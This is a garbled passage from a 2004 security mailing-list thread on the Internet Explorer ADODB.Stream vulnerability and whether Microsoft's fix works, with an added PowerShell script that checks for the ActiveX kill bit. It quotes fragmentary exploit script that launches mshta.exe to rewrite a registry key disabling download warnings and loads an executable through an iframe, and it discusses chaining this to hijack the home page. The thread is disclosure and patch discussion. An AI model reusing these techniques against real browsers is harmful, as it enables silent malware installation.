Matthew Murphy wrote:
[snip]
Well, the problem with ADODB.Stream wasn't executing files, it was writing them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The problem is that code loaded from the Internet zone is just not supposed to be allowed to get access to
] Fix for IE ADODB.Stream vulnerability is out
What you should be getting (assuming the patch does work) is something like the following:
line: 3
char: 3
Error: Access is denied
Code: 0
etc...
Dunno why it doesn't work on some systems though.
Kind regards,
Pascal Zoutendijk
TBWA \ ICT Services
Prof W.H. Keesomlaan 8
1183 DJ
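A defender-side check that goes with the "Access is denied" result described above. This is an added example, not code from the thread or from Microsoft's fix; it assumes the well-known ADODB.Stream CLSID {00000566-0000-0010-8000-00AA006D2EA4} and that the fix blocks the control by setting the 0x400 "kill bit" in Internet Explorer's ActiveX Compatibility key, which is how such controls are normally disabled.

```powershell
# Added example (not from the original thread): report whether the ADODB.Stream
# ActiveX control is blocked in Internet Explorer via its kill bit.
# Assumptions: the CLSID below is ADODB.Stream's, and the kill bit is the 0x400
# flag in the "Compatibility Flags" value (checked in both native and WOW6432 views).
$Clsid   = '{00000566-0000-0010-8000-00AA006D2EA4}'
$KillBit = 0x400
$Views = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Test-AdodbStreamKillBit {
    foreach ($Key in $Views) {
        if (-not (Test-Path $Key)) {
            # No compatibility entry at all: the control is not blocked in this view.
            [pscustomobject]@{ Key = $Key; Flags = $null; Blocked = $false; Reason = 'no entry' }
            continue
        }
        $Flags = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $Flags) {
            [pscustomobject]@{ Key = $Key; Flags = $null; Blocked = $false; Reason = 'no Compatibility Flags value' }
            continue
        }
        # The kill bit is one flag among several; test it with a bitwise AND.
        $Blocked = (($Flags -band $KillBit) -eq $KillBit)
        [pscustomobject]@{
            Key     = $Key
            Flags   = ('0x{0:X}' -f $Flags)
            Blocked = $Blocked
            Reason  = if ($Blocked) { 'kill bit set' } else { 'kill bit not set' }
        }
    }
}

Test-AdodbStreamKillBit | Format-List
```

A system where the patch "doesn't work" should show Blocked = False in at least one view; a correctly patched one shows the kill bit set, matching the "Access is denied" error the message describes.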
Microsoft's announcement?
-----Original Message-----
From: Pascal Zoutendijk [mailto:[EMAIL PROTECTED]]
Sent: Friday, 2 July 2004 23:28
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability
Jelmer writes:
Because we avoid the adodb.stream issue altogether. You can patch it, but if you leave open other issues, well, it's pointless. Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing them
The real fault doesn't belong with individual components (ADODB.Stream included), and I think the almost rant-like posts of Drew Copeley and HTTP-EQUIV miss this fact. ADODB.Stream does *not* represent a vulnerability, although it does act to significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It'd still have to contend with mshta.exe calling out through the iframe, and more than likely firewalled long ago, so use it to write the registry to kill the download warning, then use it to set the browser home page as http://www/foo.exe, that or the default search engine.
tons of